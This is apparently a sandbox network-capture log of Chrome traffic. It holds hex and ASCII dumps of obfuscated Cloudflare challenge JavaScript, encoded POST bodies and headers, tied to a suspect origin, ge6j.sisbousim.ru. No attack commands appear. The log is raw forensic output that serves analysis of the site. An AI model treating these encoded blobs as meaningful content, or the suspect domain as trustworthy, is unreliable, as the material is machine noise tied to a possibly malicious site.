                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 27 3a 67 58 28 36 34 33 29 2c 27 77 69 64 67 65 74 49 64 27 3a 73 5b 67 58 28 31 31 30 37 29 5d 5b 67 58 28 31 31 36 31 29 5d 2c 27 65 76 65 6e 74 27 3a 4a 5b 67 58 28 31 33 34 35 29 5d 7d 2c 27 2a 27 29 3a 28 4f 62 6a 65 63 74 5b 67 58 28 37 31 34 29 5d 5b 67 58 28 31 31 32 31 29 5d 5b 67 58 28 38 38 37 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 67 58 28 31 32 30 37 29 5d 28 47 29 29 7d 7d 2c 65 57 3d 67 49 28 39 30 37 29 5b 67 49 28 31 31 35 31 29 5d 28 27 3b 27 29 2c 65 58 3d 65 57 5b 67 49 28 39 30 39 29 5d 5b 67 49 28 33 33 39 29 5d 28 65 57 29 2c 65 4d 5b 67 49 28 31 32 31 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 67 5a 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 28 67 5a 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b
                                                                              Data Ascii: ':gX(643),'widgetId':s[gX(1107)][gX(1161)],'event':J[gX(1345)]},'*'):(Object[gX(714)][gX(1121)][gX(887)](j,H)||(j[H]=[]),j[H][gX(1207)](G))}},eW=gI(907)[gI(1151)](';'),eX=eW[gI(909)][gI(339)](eW),eM[gI(1213)]=function(h,i,gZ,j,k,l,m,n,o){for(gZ=gI,j={},j[
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 73 50 63 6c 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 73 63 49 57 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 7a 71 55 61 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 69 4c 4a 54 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 41 43 70 6c 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 65 65 63 71 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6c 53 6c 70 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c
                                                                              Data Ascii: ){return i|h},'sPclL':function(h,i){return h<<i},'scIWG':function(h,i){return i==h},'zqUao':function(h,i){return h(i)},'iLJTa':function(h,i){return h<i},'ACplk':function(h,i){return h>i},'eecqS':function(h,i){return h-i},'lSlpK':function(h,i){return h>i},
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 33 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 50 2c 4c 2c 4d 2c 4e 29 7b 69 66 28 69 33 3d 68 59 2c 73 3d 7b 27 50 49 72 57 64 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3c 50 7d 2c 27 44 75 63 6b 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 31 29 7b 72 65 74 75 72 6e 20 69 31 3d 62 2c 64 5b 69 31 28 31 35 30 30 29 5d 28 4f 2c 50 29 7d 2c 27 47 57 4a 47 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 4f 3c 3c 50 7d 2c 27 64 4a 77 42 79 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 29 7b 72 65 74 75 72 6e 20 50 7c 4f 7d 2c 27 6e 55 6a 6b 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 4f 2c 50 2c 69 32 29 7b 72 65 74 75 72 6e 20 69 32 3d 62 2c 64 5b 69 32 28 31 35 37 35 29 5d 28 4f
                                                                              Data Ascii: 3,s,x,B,C,D,E,F,G,H,I,J,K,P,L,M,N){if(i3=hY,s={'PIrWd':function(O,P){return O<P},'Ducko':function(O,P,i1){return i1=b,d[i1(1500)](O,P)},'GWJGZ':function(O,P){return O<<P},'dJwBy':function(O,P){return P|O},'nUjkL':function(O,P,i2){return i2=b,d[i2(1575)](O
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 29 5d 28 4a 2c 64 5b 69 33 28 39 35 34 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 33 28 31 32 30 37 29 5d 28 64 5b 69 33 28 35 30 34 29 5d 28 6f 2c 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 64 5b 69 33 28 31 33 35 37 29 5d 28 78 2c 47 29 3b 49 3d 49 3c 3c 31 7c 4e 2c 6a 2d 31 3d 3d 4a 3f 28 4a 3d 30 2c 48 5b 69 33 28 31 32 30 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3d 30 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 33 28 34 34 34 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 69 33 28 31 35 37 35 29 5d 28 31 36 2c 78 29 3b 49 3d 64 5b 69 33 28 31 36 34 31 29 5d 28 64 5b 69 33 28 31 33 30 34 29 5d 28 49 2c 31 29 2c 31 26 4e 29 2c 6a 2d 31 3d 3d 4a 3f 28 4a
                                                                              Data Ascii: )](J,d[i3(954)](j,1))?(J=0,H[i3(1207)](d[i3(504)](o,I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;d[i3(1357)](x,G);I=I<<1|N,j-1==J?(J=0,H[i3(1207)](o(I)),I=0):J++,N=0,x++);for(N=D[i3(444)](0),x=0;d[i3(1575)](16,x);I=d[i3(1641)](d[i3(1304)](I,1),1&N),j-1==J?(J
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 7b 48 5b 69 33 28 31 32 30 37 29 5d 28 6f 28 49 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4a 2b 2b 3b 72 65 74 75 72 6e 20 48 5b 69 33 28 34 39 37 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 34 29 7b 72 65 74 75 72 6e 20 69 34 3d 68 59 2c 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 27 27 3d 3d 68 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 69 34 28 38 37 37 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 35 29 7b 72 65 74 75 72 6e 20 69 35 3d 69 34 2c 68 5b 69 35 28 34 34 34 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 36 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 69 36 3d 68 59 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c
                                                                              Data Ascii: {H[i3(1207)](o(I));break}else J++;return H[i3(497)]('')},'j':function(h,i4){return i4=hY,h==null?'':''==h?null:f.i(h[i4(877)],32768,function(i,i5){return i5=i4,h[i5(444)](i)})},'i':function(i,j,o,i6,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(i6=hY,s=[],x=4,B=4,
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 36 28 31 36 37 35 29 5d 28 64 5b 69 36 28 31 31 37 30 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 69 36 28 39 33 37 29 5d 28 65 2c 4a 29 2c 4f 3d 64 5b 69 36 28 31 32 35 35 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 69 36 28 34 39 37 29 5d 28 27 27 29 7d 69 66 28 64 5b 69 36 28 31 30 33 33 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 69 36 28 36 39 32 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4f 5d 29 4f 3d 73 5b 4f 5d 3b 65 6c 73 65 20 69 66 28 64 5b 69 36 28 38 33 32 29 5d 28 4f 2c 42 29 29 4f 3d 64 5b 69 36 28 37 36 30 29 5d 28 45 2c 45 5b 69 36 28 31 30 34 33 29 5d 28 30 29 29 3b 65 6c 73 65 20
                                                                              Data Ascii: o,I++)),J|=d[i6(1675)](d[i6(1170)](0,N)?1:0,F),F<<=1);s[B++]=d[i6(937)](e,J),O=d[i6(1255)](B,1),x--;break;case 2:return D[i6(497)]('')}if(d[i6(1033)](0,x)&&(x=Math[i6(692)](2,C),C++),s[O])O=s[O];else if(d[i6(832)](O,B))O=d[i6(760)](E,E[i6(1043)](0));else
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 29 5d 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6e 3d 66 42 5b 69 39 28 35 30 36 29 5d 28 73 29 5b 69 39 28 31 33 37 38 29 5d 28 27 2b 27 2c 69 39 28 34 39 34 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 73 3d 28 6f 3d 7b 7d 2c 6f 5b 69 39 28 31 32 37 36 29 5d 3d 67 2c 6f 2e 63 63 3d 68 2c 6f 5b 69 39 28 31 32 34 31 29 5d 3d 78 2c 6f 5b 69 39 28 31 34 34 36 29 5d 3d 46 2c 4a 53 4f 4e 5b 69 39 28 34 30 31 29 5d 28 6f 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 78 3d 69 7c 7c 6b 5b 69 39 28 31 36 34 32 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 42 3d 6b 5b 69 39 28 36 30 36 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a
                                                                              Data Ascii: )]('|'),m=0;!![];){switch(l[m++]){case'0':n=fB[i9(506)](s)[i9(1378)]('+',i9(494));continue;case'1':s=(o={},o[i9(1276)]=g,o.cc=h,o[i9(1241)]=x,o[i9(1446)]=F,JSON[i9(401)](o));continue;case'2':x=i||k[i9(1642)];continue;case'3':B=k[i9(606)];continue;case'4':


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.449776104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:58 UTC438OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:59 UTC210INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:59 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912a029e27c78-EWR
                                                                              2024-10-03 01:13:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.44977735.190.80.14438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:59 UTC544OUTOPTIONS /report/v4?s=zZQRG60xCy9TgbQXucSIhcQcAohfQ9Pu%2BGzMBLuQAabo2K51xMlF8RFgASW9uj1KDW3jib2RN9D99FkMwEczc%2FoNzWjnztIXtWV61%2Bf%2FvW%2FPUuKekvyimmtui%2FSz%2FQ%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://ge6j.sisbousim.ru
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:59 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: OPTIONS, POST
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-length, content-type
                                                                              date: Thu, 03 Oct 2024 01:13:58 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.449778104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:59 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1195242463:1727915362:58hzP5tn3icoVJf6EYrrU2uDT5trH6Au5dft6Khkcu4/8cc91295984a41f3/d43438995eb8455 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 2768
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: d43438995eb8455
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:59 UTC2768OUTData Raw: 76 5f 38 63 63 39 31 32 39 35 39 38 34 61 34 31 66 33 3d 59 64 55 31 42 31 37 31 64 31 39 31 51 36 46 56 36 46 7a 31 36 6e 73 6a 41 25 32 62 36 58 46 41 46 30 62 6e 69 72 57 46 63 49 74 46 57 57 36 4d 46 75 46 54 6e 58 6a 47 57 64 45 6d 58 46 69 39 5a 79 73 4b 46 4f 46 4d 57 73 62 46 59 68 6a 72 66 46 73 57 46 66 35 46 49 6a 46 35 79 46 46 6a 66 72 31 41 6a 6d 38 69 77 79 48 79 50 55 66 31 73 4d 46 62 45 6a 45 55 35 30 31 41 75 77 78 53 37 2b 64 70 6e 4f 6a 31 49 6e 4d 46 2b 31 57 31 46 7a 46 69 47 48 75 73 24 51 54 6e 53 56 65 62 43 57 46 49 50 54 46 58 49 58 6d 58 72 66 46 46 47 2b 46 41 67 49 31 6d 67 46 78 39 75 57 46 36 2d 46 78 50 6a 2d 59 79 37 78 69 73 4b 46 4c 6e 46 38 46 6d 47 74 46 73 68 63 4a 55 6d 50 46 46 43 58 46 36 2b 35 71 67 50 4c 52 4d
                                                                              Data Ascii: v_8cc91295984a41f3=YdU1B171d191Q6FV6Fz16nsjA%2b6XFAF0bnirWFcItFWW6MFuFTnXjGWdEmXFi9ZysKFOFMWsbFYhjrfFsWFf5FIjF5yFFjfr1Ajm8iwyHyPUf1sMFbEjEU501AuwxS7+dpnOj1InMF+1W1FzFiGHus$QTnSVebCWFIPTFXIXmXrfFFG+FAgI1mgFx9uWF6-FxPj-Yy7xisKFLnF8FmGtFshcJUmPFFCXF6+5qgPLRM
                                                                              2024-10-03 01:13:59 UTC717INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:59 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 152120
                                                                              Connection: close
                                                                              cf-chl-gen: GqjBmCZ4zjHLySd3INAzg9FkYmQ/eEs3qg4QYSusskbcHxXyrrsNJ7KWpRaiUl8bSo3//0UQHgYgKueDvK8/Hy271slQ+Mqec5cpXIdp7D2h8fdY6UGSMrV4Dty+a+a4/3HEMTMTDG4/r9a3wb/NW9EjgBCzxXd1uwKAGbVe5Qhn6Jty8GhLcU47obDIepADMIHq5gZcGehAMaaFzOPK11CBQhpyxSla/kFkEGuKo0whyTIU2xlfhS0yCqApcqDxWAIdkRJdMam7uSv+Ae847RszxmQV1wBqzH2wVw/xub7lqd4hsaaZI7sSnAJuQSvqMjjVscznTQhrer5CccTfN2xmY5XlzZn+akQyRJfcxWqKHdRAfuDH480l0/w1OwOMnR/06o6AfFQT4pxiS+UUjc4ba7uUSqRZff4/qsfX+U8EvwuhCJX2QIJgOvR8JM+K8Fmi8nJOdlzPApMythSP+LskNOELJN3FUsGTzGBtwgxeBJM=$xmJGbhpwx/V5ohcH
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912a0cf0043e2-EWR
                                                                              2024-10-03 01:13:59 UTC652INData Raw: 70 71 65 32 63 35 57 51 6e 61 53 69 70 4d 6d 79 6c 4a 71 30 6d 4b 4b 71 6e 4d 32 69 6f 5a 36 77 70 38 37 41 79 5a 44 49 73 35 61 64 74 72 2b 68 7a 4b 44 41 77 37 61 68 30 37 76 49 75 4e 36 71 72 61 76 75 7a 38 50 41 33 2b 37 6b 78 74 50 36 37 76 72 63 37 74 2f 4d 41 50 72 71 39 64 38 48 2b 76 62 6f 39 76 66 61 42 4d 58 38 33 75 37 5a 41 63 30 55 45 39 58 55 34 50 66 71 31 75 58 31 44 4f 77 4c 33 65 48 66 34 77 54 31 42 67 59 68 46 43 41 4b 4a 52 72 2b 49 43 55 65 45 7a 58 39 39 66 4d 52 47 41 73 61 4d 50 55 71 4e 54 54 35 4c 78 49 46 47 79 59 38 43 55 67 2b 49 51 30 6c 52 51 68 51 52 54 35 45 4c 79 38 71 56 55 55 6a 4a 46 67 61 53 56 63 79 50 30 70 58 49 56 56 6b 58 6a 6f 2f 4f 7a 73 6b 51 30 4a 69 61 6c 70 6b 54 32 46 71 54 6b 52 76 63 45 4e 71 4f 55 63
                                                                              Data Ascii: pqe2c5WQnaSipMmylJq0mKKqnM2ioZ6wp87AyZDIs5adtr+hzKDAw7ah07vIuN6qravuz8PA3+7kxtP67vrc7t/MAPrq9d8H+vbo9vfaBMX83u7ZAc0UE9XU4Pfq1uX1DOwL3eHf4wT1BgYhFCAKJRr+ICUeEzX99fMRGAsaMPUqNTT5LxIFGyY8CUg+IQ0lRQhQRT5ELy8qVUUjJFgaSVcyP0pXIVVkXjo/OzskQ0JialpkT2FqTkRvcENqOUc
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 5a 48 57 73 6e 35 32 71 70 59 47 6c 72 6f 4f 6a 73 36 4b 52 6f 59 6d 6a 75 37 61 71 6c 5a 53 37 71 58 76 42 6a 4a 53 6a 6d 36 6a 48 6d 35 4f 32 75 4a 36 46 6d 61 62 44 73 73 4b 67 7a 73 4c 43 30 5a 4f 76 31 37 6d 63 32 4e 53 37 32 74 61 38 76 35 37 66 79 4c 58 53 32 4e 57 34 71 75 65 36 73 63 36 72 33 2b 72 52 79 62 50 6f 37 4c 6e 7a 73 2b 76 63 2f 4c 37 68 76 2f 4b 2b 39 66 7a 62 41 41 4d 4e 2f 75 62 75 41 76 67 49 32 38 76 38 30 64 4d 51 47 41 2f 34 42 68 37 36 45 75 34 50 47 76 34 44 41 51 38 45 42 2f 55 42 43 41 76 35 4b 77 77 50 2f 52 38 51 45 77 4d 4e 46 42 63 47 37 78 67 62 42 7a 73 63 48 77 73 76 49 43 4d 50 2b 79 51 6e 46 45 63 6f 4b 78 67 6f 4b 43 52 42 44 79 42 4a 4a 53 41 6f 57 55 45 36 53 46 49 79 53 68 55 7a 4f 79 77 34 4d 6d 59 78 4f 30 55
                                                                              Data Ascii: ZHWsn52qpYGlroOjs6KRoYmju7aqlZS7qXvBjJSjm6jHm5O2uJ6FmabDssKgzsLC0ZOv17mc2NS72ta8v57fyLXS2NW4que6sc6r3+rRybPo7Lnzs+vc/L7hv/K+9fzbAAMN/ubuAvgI28v80dMQGA/4Bh76Eu4PGv4DAQ8EB/UBCAv5KwwP/R8QEwMNFBcG7xgbBzscHwsvICMP+yQnFEcoKxgoKCRBDyBJJSAoWUE6SFIyShUzOyw4MmYxO0U
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 5a 70 39 63 6f 6d 4f 62 58 61 58 6d 49 78 31 74 5a 65 71 6e 71 68 34 76 35 65 72 74 61 36 7a 76 70 57 30 74 70 36 33 71 72 69 6c 6b 4b 36 38 71 4b 57 68 31 71 72 4f 74 38 54 4a 72 4e 4b 7a 31 73 2b 54 30 70 58 59 6f 36 62 44 32 71 66 4c 31 64 61 6c 7a 4b 36 76 73 63 71 79 73 37 58 47 74 72 65 35 78 38 53 32 37 4d 62 79 36 41 50 71 76 41 4d 43 78 50 6e 49 39 50 50 7a 41 66 6e 46 45 4d 2f 37 44 4f 44 67 45 65 6b 50 37 74 50 78 31 4e 49 55 32 77 41 55 41 39 77 44 47 41 63 50 2f 68 30 68 49 74 30 42 2b 53 67 77 2f 69 54 75 43 52 45 4c 49 51 4d 58 4d 50 50 31 2b 53 30 65 48 7a 45 68 49 43 4d 50 2b 79 51 6e 46 45 63 6f 4b 78 67 6f 4b 43 52 42 44 79 42 4a 4a 53 41 6f 57 55 45 36 53 46 4a 62 56 6c 73 33 55 43 38 34 48 56 6f 31 50 45 56 6e 56 56 31 45 50 6b 78 70
                                                                              Data Ascii: Zp9comObXaXmIx1tZeqnqh4v5erta6zvpW0tp63qrilkK68qKWh1qrOt8TJrNKz1s+T0pXYo6bD2qfL1dalzK6vscqys7XGtre5x8S27Mby6APqvAMCxPnI9PPzAfnFEM/7DODgEekP7tPx1NIU2wAUA9wDGAcP/h0hIt0B+Sgw/iTuCRELIQMXMPP1+S0eHzEhICMP+yQnFEcoKxgoKCRBDyBJJSAoWUE6SFJbVls3UC84HVo1PEVnVV1EPkxp
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 4a 32 6c 49 4a 31 65 36 52 39 71 34 68 35 64 37 46 38 73 72 65 65 74 4a 71 6b 79 5a 65 72 6e 71 4b 70 77 38 65 51 69 34 71 73 31 34 2b 4b 78 36 57 52 6e 4e 71 31 6d 36 69 34 75 64 72 66 6c 39 75 66 71 4e 65 31 37 4b 7a 71 70 4f 69 34 79 4d 6d 72 74 4f 53 7a 37 2f 6d 7a 31 4f 58 39 36 75 76 78 73 74 6a 4f 2b 2f 54 2b 77 41 6a 63 39 77 44 30 79 77 34 4e 44 2b 45 47 37 51 6b 42 30 77 50 69 34 52 66 73 48 42 7a 75 46 39 73 68 39 52 59 67 44 75 37 77 34 51 63 6f 34 41 7a 6a 43 67 55 63 4d 68 6f 76 2b 79 41 50 4e 50 49 6b 4c 2f 55 64 43 44 34 49 43 41 31 42 4c 52 73 53 48 77 59 32 52 6b 6b 45 4c 45 41 65 4e 7a 35 47 4a 6a 4e 4d 4b 46 59 70 46 6b 4d 72 4a 7a 49 62 47 52 34 58 47 6b 4d 74 4f 54 4a 6b 4f 54 5a 54 61 79 6f 2b 4e 31 35 4c 51 6c 70 4d 5a 54 77 39 55
                                                                              Data Ascii: J2lIJ1e6R9q4h5d7F8sreetJqkyZernqKpw8eQi4qs14+Kx6WRnNq1m6i4udrfl9ufqNe17KzqpOi4yMmrtOSz7/mz1OX96uvxstjO+/T+wAjc9wD0yw4ND+EG7QkB0wPi4RfsHBzuF9sh9RYgDu7w4Qco4AzjCgUcMhov+yAPNPIkL/UdCD4ICA1BLRsSHwY2RkkELEAeNz5GJjNMKFYpFkMrJzIbGR4XGkMtOTJkOTZTayo+N15LQlpMZTw9U
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 39 6b 62 4b 37 65 61 32 36 74 33 2b 45 67 6f 65 55 6c 35 61 43 6d 49 76 47 79 64 47 67 78 38 62 51 71 63 6d 4b 31 4d 2f 52 31 4d 71 2b 30 64 4b 59 75 5a 33 53 77 37 57 69 6f 4f 66 6b 30 35 36 35 37 4c 79 6d 71 73 48 6e 71 2b 2f 6d 72 66 66 79 73 2f 6e 37 30 62 66 34 30 62 7a 56 41 73 4c 54 34 2f 54 44 34 67 6e 2b 34 66 33 6f 42 65 62 71 42 64 49 4d 79 78 66 6b 43 67 73 47 43 2f 4c 58 38 2f 6a 71 39 77 34 61 37 68 51 58 2b 77 49 72 36 68 33 6f 4b 51 49 41 4c 76 41 62 38 79 38 4b 45 67 30 78 46 43 63 49 2b 78 51 2b 4e 52 38 59 41 54 77 34 4e 41 52 42 4f 41 68 43 43 7a 78 4b 4a 43 45 66 54 6b 73 6b 4a 55 63 6c 4b 45 4e 62 56 6b 55 78 47 6a 5a 49 51 52 73 39 49 69 55 35 4d 79 45 36 52 55 4a 74 58 30 64 50 59 55 73 73 61 6a 46 64 4d 55 35 35 61 32 78 36 62 33
                                                                              Data Ascii: 9kbK7ea26t3+EgoeUl5aCmIvGydGgx8bQqcmK1M/R1Mq+0dKYuZ3Sw7WioOfk05657LymqsHnq+/mrffys/n70bf40bzVAsLT4/TD4gn+4f3oBebqBdIMyxfkCgsGC/LX8/jq9w4a7hQX+wIr6h3oKQIALvAb8y8KEg0xFCcI+xQ+NR8YATw4NARBOAhCCzxKJCEfTkskJUclKENbVkUxGjZIQRs9IiU5MyE6RUJtX0dPYUssajFdMU55a2x6b3
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 6a 72 2f 48 6d 4a 66 42 79 35 6d 31 72 73 4f 6e 69 4b 36 2f 6b 4b 75 68 71 63 43 69 31 38 36 53 32 63 33 64 74 36 6e 51 34 62 75 36 7a 75 54 5a 31 65 66 6d 36 73 48 66 74 2f 44 4e 34 36 37 4f 30 65 6a 4c 35 64 69 35 7a 74 62 76 39 65 30 42 38 50 4d 43 34 63 50 41 78 74 76 6c 39 66 67 41 37 50 58 4a 32 4f 51 52 41 68 50 6f 46 68 45 50 44 4f 72 58 46 74 50 74 42 77 72 58 39 42 66 69 39 66 54 6c 2b 69 4d 72 44 50 76 6a 4c 66 30 45 36 43 63 4a 42 65 30 69 4a 53 73 58 4d 6a 6b 46 45 41 63 75 51 43 6c 43 50 44 34 46 4d 6a 68 46 46 52 6c 4d 4a 6a 6f 59 47 51 6b 73 48 42 78 4c 51 69 77 78 44 6c 6b 59 4a 78 55 70 47 45 41 7a 54 46 64 45 4e 31 42 62 53 44 74 55 58 30 77 2f 57 47 4e 51 51 31 78 6e 56 45 64 67 61 31 68 4c 5a 47 39 63 54 32 68 7a 59 46 4e 73 64 32 52
                                                                              Data Ascii: jr/HmJfBy5m1rsOniK6/kKuhqcCi186S2c3dt6nQ4bu6zuTZ1efm6sHft/DN467O0ejL5di5ztbv9e0B8PMC4cPAxtvl9fgA7PXJ2OQRAhPoFhEPDOrXFtPtBwrX9Bfi9fTl+iMrDPvjLf0E6CcJBe0iJSsXMjkFEAcuQClCPD4FMjhFFRlMJjoYGQksHBxLQiwxDlkYJxUpGEAzTFdEN1BbSDtUX0w/WGNQQ1xnVEdga1hLZG9cT2hzYFNsd2R
